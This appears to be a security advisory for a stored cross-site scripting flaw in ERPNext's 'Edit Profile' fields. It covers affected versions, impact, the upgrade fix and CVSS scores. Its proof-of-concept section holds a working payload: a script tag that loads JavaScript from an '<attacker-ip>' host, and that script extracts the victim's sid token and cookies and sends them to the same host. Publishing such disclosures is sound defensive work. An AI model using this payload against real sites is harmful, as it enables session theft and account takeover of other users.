We found results for “


Date: June 22, 2022


ERPNext is affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts on ‘Location’, ‘Interests’ and ‘Bio’ fields in the “Edit Profile” section. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the javascript payload is stored on the server, the victim would not be able to browse through the platform.


In ERPNext, versions v12.0.9--v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.

PoC Details

Login as a low application user, go to the ‘My profile’ section under “Settings”, then click on the ‘Edit Profile’ button. Edit ‘Bio’ input field, insert the XSS payload, as can be seen in the POC code section. Now create a file ‘test1.js’ as described in the POC code and set-up a simple http listener. Once a user will login, the payload will get executed and the user’s cookie session will be compromised. Using the captured data the attacker can login as another user.

test1.js code:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
url = 'http://<attacker-ip>:<port>/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;

PoC Code

javascript XSS code:
<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3


Upgrade to ERPNext version 13.1.0

Language: Python

Good to know:


Cross-Site Scripting (XSS)


Upgrade Version

Upgrade to version v13.1.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: